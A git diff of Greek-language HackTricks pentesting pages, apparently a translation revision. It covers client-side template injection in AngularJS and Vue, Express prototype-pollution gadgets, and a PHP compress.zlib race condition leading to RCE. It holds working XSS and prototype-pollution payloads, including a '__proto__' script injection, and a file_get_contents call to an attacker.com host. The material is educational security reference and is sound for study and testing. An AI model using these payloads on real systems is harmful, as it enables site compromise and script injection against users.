#### **Προβλέψιμες Τιμές Μπισκότου**
|
||||
|
||||
Η μαντεψιά της τιμής του μπισκότου "θυμήσου με" μπορεί να παρακάμψει τους περιορισμούς.
|
||||
|
||||
#### **
|
||||
#### **Απομίμηση Διεύθυνσης IP**
|
||||
|
||||
Η απομίμηση της διεύθυνσης IP του θ
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -12,15 +12,15 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,11 +30,11 @@
|
|||
|
||||
Είναι σαν ένα [**Server Side Template Injection**](ssti-server-side-template-injection/) αλλά στον **πελάτη**. Το **SSTI** μπορεί να σας επιτρέψει να **εκτελέσετε κώδικα** στον απομακρυσμένο διακομιστή, το **CSTI** θα μπορούσε να σας επιτρέψει να **εκτελέσετε αυθαίρετο κώδικα JavaScript** στον περιηγητή του θύματος.
|
||||
|
||||
Η **δοκιμή** για αυτήν την ευπάθεια είναι πολύ **παρόμοια** με την περίπτωση του **SSTI**, ο διερμηνευτής περιμένει **ένα πρότυπο** και θα το εκτελέσει. Για παράδειγμα, με ένα φορτίο όπως `{{ 7-7 }}`, αν η εφαρμογή είναι **ευάθροτη** θα δείτε ένα `0`, και αν όχι, θα δείτε το αρχικό: `{{ 7-7 }}`
|
||||
Η **Δοκιμή** για αυτήν την ευπάθεια είναι πολύ **παρόμοια** με την περίπτωση του **SSTI**, ο διερμηνευτής περιμένει **ένα πρότυπο** και θα το εκτελέσει. Για παράδειγμα, με ένα φορτίο όπως `{{ 7-7 }}`, αν η εφαρμογή είναι **ευάθροτη** θα δείτε ένα `0`, και αν όχι, θα δείτε το αρχικό: `{{ 7-7 }}`
|
||||
|
||||
# AngularJS
|
||||
|
||||
Το AngularJS είναι ένα δημοφιλές πλαίσιο JavaScript που αλληλεπιδρά με το HTML μέσω χαρακτηριστικών που ονομάζονται οδηγίες, μια από τις πιο γνωστές είναι το **`ng-app`**. Αυτή η οδηγία επιτρέπει στο AngularJS να επεξεργαστεί το περιεχόμενο HTML, επιτρέποντας την εκτέλεση εκφράσεων JavaScript μέσα σε διπλές αγκύλες.
|
||||
Το AngularJS είναι ένα δημοφιλές πλαίσιο JavaScript που αλληλεπιδρά με το HTML μέσω χαρακτηριστικών που ονομάζονται οδηγίες, μια από τις πιο γνωστές είναι το **`ng-app`**. Αυτή η οδηγία επιτρέπει στο AngularJS να επεξεργαστεί το περιεχόμενο του HTML, επιτρέποντας την εκτέλεση εκφράσεων JavaScript μέσα σε διπλές αγκύλες.
|
||||
|
||||
Σε περιπτώσεις όπου η είσοδος χρήστη εισάγεται δυναμικά στο σώμα HTML με ετικέτες `ng-app`, είναι δυνατή η εκτέλεση αυθαίρετου κώδικα JavaScript. Αυτό μπορεί να επιτευχθεί εκμεταλλευόμενος τη σύνταξη του AngularJS μέσα στην είσοδο. Παρακάτω παρουσιάζονται παραδείγματα που δείχνουν πώς μπορεί να εκτελεστεί κώδικας JavaScript:
|
||||
```javascript
|
||||
|
@ -48,15 +48,15 @@
|
|||
Μπορείτε να βρείτε ένα πολύ **βασικό online παράδειγμα** της ευπάθειας στο **AngularJS** στο [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) και στο **[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)**
|
||||
|
||||
{% hint style="danger" %}
|
||||
[**Το Angular 1.6 αφαίρεσε την αμμοθούρα**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) έτσι από αυτήν την έκδοση ένα payload όπως `{{constructor.constructor('alert(1)')()}}` ή `<input ng-focus=$event.view.alert('XSS')>` θα πρέπει να λειτουργεί.
|
||||
[**Το Angular 1.6 αφαίρεσε την αμμοθεκτική ζώνη**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) έτσι από αυτήν την έκδοση ένα φορτίο όπως `{{constructor.constructor('alert(1)')()}}` ή `<input ng-focus=$event.view.alert('XSS')>` θα πρέπει να λειτουργεί.
|
||||
{% endhint %}
|
||||
|
||||
# VueJS
|
||||
|
||||
Μπορείτε να βρείτε μια **ευάθροτη υλοποίηση Vue** στο [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
|
||||
Λειτουργικό payload: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
|
||||
Μπορείτε να βρείτε μια **ευάθροιστη υλοποίηση Vue** στο [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
|
||||
Λειτουργικό φορτίο: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
|
||||
|
||||
Και ο **κώδικας πηγής** του ευάθροτου παραδείγματος εδώ: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
|
||||
Και ο **πηγαίος κώδικας** του ευάθροιστου παραδείγματος εδώ: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
|
||||
```markup
|
||||
<!-- Google Research - Vue.js-->
|
||||
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
|
||||
|
@ -67,13 +67,13 @@
|
|||
```
|
||||
{{_openBlock.constructor('alert(1)')()}}
|
||||
```
|
||||
Πιστώσεις: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
|
||||
Πίστωση: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
|
||||
|
||||
## **V2**
|
||||
```
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
```
|
||||
Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
|
||||
Πιστώσεις: [Mario Heiderich](https://twitter.com/cure53berlin)
|
||||
|
||||
**Ελέγξτε περισσότερα payloads VUE στο** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)
|
||||
|
||||
|
@ -99,15 +99,15 @@ javascript:alert(1)%252f%252f..%252fcss-images
|
|||
|
||||
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -119,7 +119,7 @@ javascript:alert(1)%252f%252f..%252fcss-images
|
|||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Ανακαλύψτε [**Την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Εργαλεία Πρωτοτύπου Ρύπανσης στο Express
|
||||
# Εργαλεία Πρωτοτύπου Ρύπανσης Στο Express
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -6,7 +6,7 @@
|
|||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -14,15 +14,15 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -34,7 +34,7 @@
|
|||
|
||||
### Αλλαγή του τύπου περιεχομένου JSON σε HTML
|
||||
|
||||
Σε μια εφαρμογή Express που χρησιμοποιεί μια **απόκριση τύπου περιεχομένου JSON** και αντανακλά ένα JSON:
|
||||
Σε μια εφαρμογή Express που χρησιμοποιεί μια **απάντηση τύπου περιεχομένου JSON** και αντανακλά ένα JSON:
|
||||
```javascript
|
||||
app.use(bodyParser.json({type: 'application/json'}));
|
||||
app.post('/', function(req, res){
|
||||
|
@ -42,15 +42,15 @@ _.merge({}, req.body);
|
|||
res.send(req.body);
|
||||
});
|
||||
```
|
||||
Σε αυτές τις περιπτώσεις το XSS συνήθως δεν είναι δυνατό με έναν τύπο περιεχομένου JSON. Ωστόσο, με τη χρήση της πρωτοτύπου μόλυνσης μπορούμε **να μπερδέψουμε το Express ώστε να εξυπηρετήσει μια απάντηση HTML.** Αυτή η ευπάθεια βασίζεται στην εφαρμογή της εντολής **`res.send(obj)`** και στη χρήση του body parser με τον τύπο περιεχομένου application/json.
|
||||
Σε αυτές τις περιπτώσεις το XSS συνήθως δεν είναι δυνατό με έναν τύπο περιεχομένου JSON. Ωστόσο, με τη χρήση της πρωτοτύπου μόλυνσης μπορούμε **να μπερδέψουμε το Express ώστε να εξυπηρετήσει μια απάντηση HTML.** Αυτή η ευπάθεια βασίζεται στην εφαρμογή που χρησιμοποιεί **`res.send(obj)`** και χρησιμοποιεί τον body parser με τον τύπο περιεχομένου application/json.
|
||||
```json
|
||||
{"__proto__":{"_body":true,"body":"<script>evil()"}}
|
||||
```
|
||||
Με το **`ρύπανση`** των ιδιοτήτων **`body`** και **`_body`**, είναι δυνατόν να προκαλέσετε το **Express να εξυπηρετήσει τον τύπο περιεχομένου HTML** και να αντανακλά την ιδιότητα `_body`, με αποτέλεσμα την αποθηκευμένη XSS.
|
||||
Με το **`ρύπανση`** των ιδιοτήτων **`body`** και **`_body`**, είναι δυνατόν να προκαλέσετε το **Express να παρέχει τον τύπο περιεχομένου HTML** και να αντανακλά την ιδιότητα `_body`, με αποτέλεσμα την αποθηκευμένη XSS.
|
||||
|
||||
### Απεικόνιση UTF7
|
||||
|
||||
Είναι δυνατόν να κάνετε το express **να απεικονίσει περιεχόμενο UTF-7 με**:
|
||||
Είναι δυνατόν να κάνετε το express **να απεικονίζει περιεχόμενο UTF-7 με**:
|
||||
```json
|
||||
{"__proto__":{"content-type": "application/json; charset=utf-7"}}
|
||||
```
|
||||
|
@ -58,11 +58,11 @@ res.send(req.body);
|
|||
|
||||
### Χώροι JSON
|
||||
|
||||
Το παρακάτω PP θα κάνει τα χαρακτηριστικά μέσα σε ένα JSON να έχουν ένα επιπλέον κενό το οποίο δεν θα διακόψει τη λειτουργικότητα:
|
||||
Το ακόλουθο PP θα κάνει τα γνωρίσματα μέσα σε ένα JSON να έχουν ένα επιπλέον κενό το οποίο δεν θα διακόψει τη λειτουργικότητα:
|
||||
```json
|
||||
{"__proto__":{"json spaces": " "}}
|
||||
```
|
||||
Έπειτα, ένα αντικατοπτρισμένο JSON θα φαίνεται ως:
|
||||
Τότε ένα αντικατοπτρισμένο JSON θα μοιάζει με:
|
||||
```json
|
||||
{"foo": "bar"} -- Note the extra space
|
||||
```
|
||||
|
@ -72,11 +72,11 @@ res.send(req.body);
|
|||
```json
|
||||
{"__proto__":{"exposedHeaders":["foo"]}}
|
||||
```
|
||||
Απαιτείται η εγκατάσταση του **ενός εξωτερικού module CORS**
|
||||
Απαιτείται η εγκατάσταση του **ενός εξωτερικού προσθέτου CORS**
|
||||
|
||||
### **Μέθοδος OPTIONS**
|
||||
|
||||
Με το παρακάτω φορτίο, είναι δυνατόν να **κρύψετε έναν μέθοδο από μια απάντηση OPTIONS**:
|
||||
Με το παρακάτω φορτίο, είναι δυνατόν να **κρύψετε μια μέθοδο από μια απάντηση OPTIONS**:
|
||||
```javascript
|
||||
// Original reponse: POST,GET,HEAD
|
||||
|
||||
|
@ -93,18 +93,18 @@ res.send(req.body);
|
|||
```
|
||||
### Σφάλμα
|
||||
|
||||
Όταν αναθέτετε σε ένα πρότυπο ένα πρωτογενές στοιχείο όπως ένα string, παράγει μια λειτουργία **no-op καθώς το πρότυπο πρέπει να είναι ένα αντικείμενο**. Εάν προσπαθήσετε να αναθέσετε ένα αντικείμενο προτύπου στο ίδιο το `Object.prototype`, αυτό θα **εκτινάξει μια εξαίρεση**. Μπορούμε να χρησιμοποιήσουμε αυτές τις δύο συμπεριφορές για να **ανιχνεύσουμε εάν η μόλυνση του προτύπου ήταν επιτυχής**:
|
||||
Όταν αναθέτετε σε ένα πρωτότυπο ένα πρωτεύοντα τύπο όπως ένα string, παράγει μια λειτουργία **no-op καθώς το πρωτότυπο πρέπει να είναι ένα αντικείμενο**. Εάν προσπαθήσετε να αναθέσετε ένα αντικείμενο πρωτοτύπου στο ίδιο το `Object.prototype`, αυτό θα **εκτοξεύσει μια εξαίρεση**. Μπορούμε να χρησιμοποιήσουμε αυτές τις δύο συμπεριφορές για να **ανιχνεύσουμε εάν η μόλυνση του πρωτοτύπου ήταν επιτυχής**:
|
||||
```javascript
|
||||
({}).__proto__.__proto__={}//throws type exception
|
||||
({}).__proto__.__proto__="x"//no-op does not throw exception
|
||||
```
|
||||
### Αντανακλώμενη Τιμή
|
||||
### Ανακλισμένη Τιμή
|
||||
|
||||
Όταν μια εφαρμογή περιλαμβάνει ένα αντικείμενο στην απάντησή της, δημιουργώντας ένα γνώριμο με **ασυνήθιστο όνομα σε συνδυασμό με το `__proto__`** μπορεί να είναι ενδιαφέρον. Συγκεκριμένα, αν **επιστρέφεται μόνο το ασυνήθιστο γνώριμο στην απάντηση**, αυτό θα μπορούσε να υποδεικνύει την ευπάθεια της εφαρμογής:
|
||||
Όταν μια εφαρμογή περιλαμβάνει ένα αντικείμενο στην απάντησή της, δημιουργώντας ένα γνώριμο όνομα μαζί με `__proto__` μπορεί να είναι ενδιαφέρον. Συγκεκριμένα, αν **επιστρέφεται μόνο το ασυνήθιστο γνώριμο χαρακτηριστικό** στην απάντηση, αυτό θα μπορούσε να υποδεικνύει την ευπάθεια της εφαρμογής:
|
||||
```json
|
||||
{"unusualName":"value","__proto__":"test"}
|
||||
```
|
||||
Επιπλέον, σε σενάρια όπου χρησιμοποιείται μια βιβλιοθήκη όπως το Lodash, η ρύθμιση μιας ιδιότητας τόσο μέσω της μόλυνσης πρωτοτύπου (PP) όσο και απευθείας μέσα στο αντικείμενο προσφέρει μια άλλη διαγνωστική προσέγγιση. Αν μια τέτοια ιδιότητα παραλείπεται από την απόκριση, υποδηλώνει ότι το Lodash επαληθεύει την ύπαρξη της ιδιότητας στο στόχευτο αντικείμενο πριν τη συγχώνευση:
|
||||
Επιπλέον, σε περιπτώσεις όπου χρησιμοποιείται μια βιβλιοθήκη όπως το Lodash, η ρύθμιση μιας ιδιότητας τόσο μέσω της μόλυνσης πρωτοτύπου (PP) όσο και απευθείας μέσα στο αντικείμενο προσφέρει μια άλλη διαγνωστική προσέγγιση. Αν μια τέτοια ιδιότητα παραλείπεται από την απόκριση, υποδηλώνει ότι το Lodash επαληθεύει την ύπαρξη της ιδιότητας στον στόχο αντικείμενο πριν τη συγχώνευση:
|
||||
```javascript
|
||||
{"__proto__":{"a":"value1"},"a":"value2","b":"value3"}
|
||||
// If 'b' is the only property reflected, this indicates prototype pollution in Lodash
|
||||
|
@ -114,7 +114,7 @@ res.send(req.body);
|
|||
### Επιτρέψτε τα Τελεία
|
||||
|
||||
Υπάρχει μια επιλογή στο Express που σας επιτρέπει να **δημιουργήσετε αντικείμενα από τις παραμέτρους της συμβολοσειράς ερωτήματος**.\
|
||||
Σίγουρα θα μπορούσατε να το χρησιμοποιήσετε σε μια αλυσίδα σφαλμάτων για να εκμεταλλευτείτε μια **ευπάθεια προσβολής πρωτοτύπου**.
|
||||
Σίγουρα θα μπορούσατε να το χρησιμοποιήσετε σε μια αλυσίδα σφαλμάτων για να εκμεταλλευτείτε μια **ευπάθεια προς προσβολή του πρωτοτύπου**.
|
||||
```json
|
||||
{"__proto__":{"allowDots":true}}
|
||||
```
|
||||
|
@ -125,13 +125,13 @@ res.send(req.body);
|
|||
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -146,7 +146,7 @@ res.send(req.body);
|
|||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφή**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) στο GitHub.
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -12,9 +12,9 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
|
@ -30,7 +30,7 @@
|
|||
|
||||
Ένα αρχείο που ανοίγεται χρησιμοποιώντας το πρωτόκολλο `compress.zlib://` με τη σημαία `PHP_STREAM_PREFER_STDIO` μπορεί να συνεχίσει να γράφει δεδομένα που φτάνουν στη σύνδεση αργότερα στο ίδιο αρχείο.
|
||||
|
||||
Αυτό σημαίνει ότι μια κλήση όπως:
|
||||
Αυτό σημαίνει ότι ένα κάλεσμα όπως:
|
||||
```php
|
||||
file_get_contents("compress.zlib://http://attacker.com/file")
|
||||
```
|
||||
|
@ -46,29 +46,29 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
|
|||
*newstream = php_stream_temp_new();
|
||||
}
|
||||
```
|
||||
## Αγώνας Κατάστασης προς RCE
|
||||
## Αγώνας Συνθήκης προς RCE
|
||||
|
||||
[**Αυτό το CTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) λύθηκε χρησιμοποιώντας το προηγούμενο κόλπο.
|
||||
|
||||
Ο επιτιθέμενος θα κάνει το **θύμα server να ανοίξει μια σύνδεση διαβάζοντας ένα αρχείο από το server του επιτιθέμενου** χρησιμοποιώντας το πρωτόκολλο **`compress.zlib`**.
|
||||
Ο επιτιθέμενος θα κάνει το **server θύματος να ανοίξει μια σύνδεση διαβάζοντας ένα αρχείο από το server του επιτιθέμενου** χρησιμοποιώντας το πρωτόκολλο **`compress.zlib`**.
|
||||
|
||||
**Ενώ** αυτή η **σύνδεση** υπάρχει, ο επιτιθέμενος θα **εξαγάγει τη διαδρομή** προς το προσωρινό αρχείο που δημιουργήθηκε (αποκαλύπτεται από τον server).
|
||||
